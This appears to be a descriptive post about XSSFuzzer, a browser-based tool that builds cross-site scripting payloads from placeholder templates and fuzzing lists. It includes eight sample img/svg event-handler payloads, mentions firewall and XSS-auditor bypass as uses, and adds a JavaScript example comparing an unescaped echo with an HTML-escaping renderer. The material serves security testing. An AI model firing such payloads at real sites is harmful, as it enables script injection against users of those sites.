XSSFuzzer – A Tool Which Generates XSS Payloads Based On User-Defined Vectors And Fuzzing Lists

XSS Fuzzer is a simple application written in plain HTML/JavaScript/CSS which generates XSS payloads based on user-defined vectors, using multiple placeholders that are replaced with fuzzing lists.

It offers the possibility to just generate the payloads as plain text or to execute them inside an iframe. Inside iframes, it is possible to send GET or POST requests from the browser to arbitrary URLs using generated payloads.

XSS Fuzzer is a generic tool that can be useful for multiple purposes, including:

  • Finding new XSS vectors, for any browser
  • Testing XSS payloads on GET and POST parameters
  • Bypassing XSS Auditors in the browser
  • Bypassing web application firewalls
  • Exploiting HTML whitelist features

In order to fuzz, it is required to create placeholders, for example:

  • The [TAG] placeholder with fuzzing list: img svg.
  • The [EVENT] placeholder with fuzzing list: onerror onload.
  • The [ATTR] placeholder with fuzzing list: src value.

The payloads will use the mentioned placeholders, such as:

<[TAG] [ATTR]=Something [EVENT]=[SAVE_PAYLOAD] />

The [SAVE_PAYLOAD] placeholder will be replaced with JavaScript code such as alert(unescape('[PAYLOAD]'));. This code is triggered when an XSS payload is successfully executed.

The result for the mentioned fuzzing lists and payload will be the following:

<img src=Something onerror=alert(unescape('%3Cimg%20src%3DSomething%20onerror%3D%5BSAVE_PAYLOAD%5D%20/%3E')); />
<img value=Something onerror=alert(unescape('%3Cimg%20value%3DSomething%20onerror%3D%5BSAVE_PAYLOAD%5D%20/%3E')); />
<img src=Something onload=alert(unescape('%3Cimg%20src%3DSomething%20onload%3D%5BSAVE_PAYLOAD%5D%20/%3E')); />
<img value=Something onload=alert(unescape('%3Cimg%20value%3DSomething%20onload%3D%5BSAVE_PAYLOAD%5D%20/%3E')); />
<svg src=Something onerror=alert(unescape('%3Csvg%20src%3DSomething%20onerror%3D%5BSAVE_PAYLOAD%5D%20/%3E')); />
<svg value=Something onerror=alert(unescape('%3Csvg%20value%3DSomething%20onerror%3D%5BSAVE_PAYLOAD%5D%20/%3E')); />
<svg src=Something onload=alert(unescape('%3Csvg%20src%3DSomething%20onload%3D%5BSAVE_PAYLOAD%5D%20/%3E')); />
<svg value=Something onload=alert(unescape('%3Csvg%20value%3DSomething%20onload%3D%5BSAVE_PAYLOAD%5D%20/%3E')); />

When it is executed in a browser such as Mozilla Firefox, it will alert the executed payloads:

<svg src=Something onload=[SAVE_PAYLOAD] />
<svg value=Something onload=[SAVE_PAYLOAD] />
<img src=Something onerror=[SAVE_PAYLOAD] />

Sending requests
It is possible to use a page vulnerable to XSS for different tests, such as bypasses for the browser XSS Auditor. The page can receive a GET or POST parameter called payload and will just display its unescaped value.
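
The test page described above, next to a hardened form, as an added example that is not XSSFuzzer's own code: it expands the page's vector with the page's fuzzing lists and checks whether each result is rendered as markup or as inert text. All function names are hypothetical, and [SAVE_PAYLOAD] is deliberately left unreplaced.

```javascript
// Added example, not part of XSSFuzzer. Function names are hypothetical.
// Fuzzing lists and vector are the ones used in the example on this page.
const lists = { TAG: ["img", "svg"], EVENT: ["onerror", "onload"], ATTR: ["src", "value"] };
const vector = "<[TAG] [ATTR]=Something [EVENT]=[SAVE_PAYLOAD] />";

// Replace each [NAME] placeholder with every entry of its list
// (Cartesian product of all lists whose placeholder appears in the template).
function expand(template, lists) {
  let out = [template];
  for (const [name, values] of Object.entries(lists)) {
    const token = `[${name}]`;
    if (!template.includes(token)) continue;
    out = out.flatMap(t => values.map(v => t.split(token).join(v)));
  }
  return out;
}

// Vulnerable form: the `payload` parameter is echoed without encoding.
function renderUnescaped(payload) {
  return `<div id="out">${payload}</div>`;
}

// Hardened form: HTML-encode the value before placing it in element content.
const ENTITIES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, c => ENTITIES[c]);
}
function renderEscaped(payload) {
  return `<div id="out">${escapeHtml(payload)}</div>`;
}

// True when the wrapper's content still contains a tag opener,
// i.e. the input would be parsed as markup instead of text.
function injectsMarkup(html) {
  const inner = html.slice('<div id="out">'.length, -"</div>".length);
  return /<[a-zA-Z]/.test(inner);
}

// Run every expanded vector through a renderer and count what gets through.
function audit(render) {
  const cases = expand(vector, lists);
  return { total: cases.length, injected: cases.filter(p => injectsMarkup(render(p))).length };
}

console.log("unescaped:", audit(renderUnescaped));
console.log("escaped:  ", audit(renderEscaped));
```

The same audit can be pointed at a real template function in a unit test, so that a change which drops output encoding fails the build.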

A live version can be found at https://xssfuzzer.com

The application is in beta state so it might have bugs. If you would like to report a bug or provide a suggestion, you can use the GitHub repository or you can send me an email to contact [a] xssfuzzer.com.
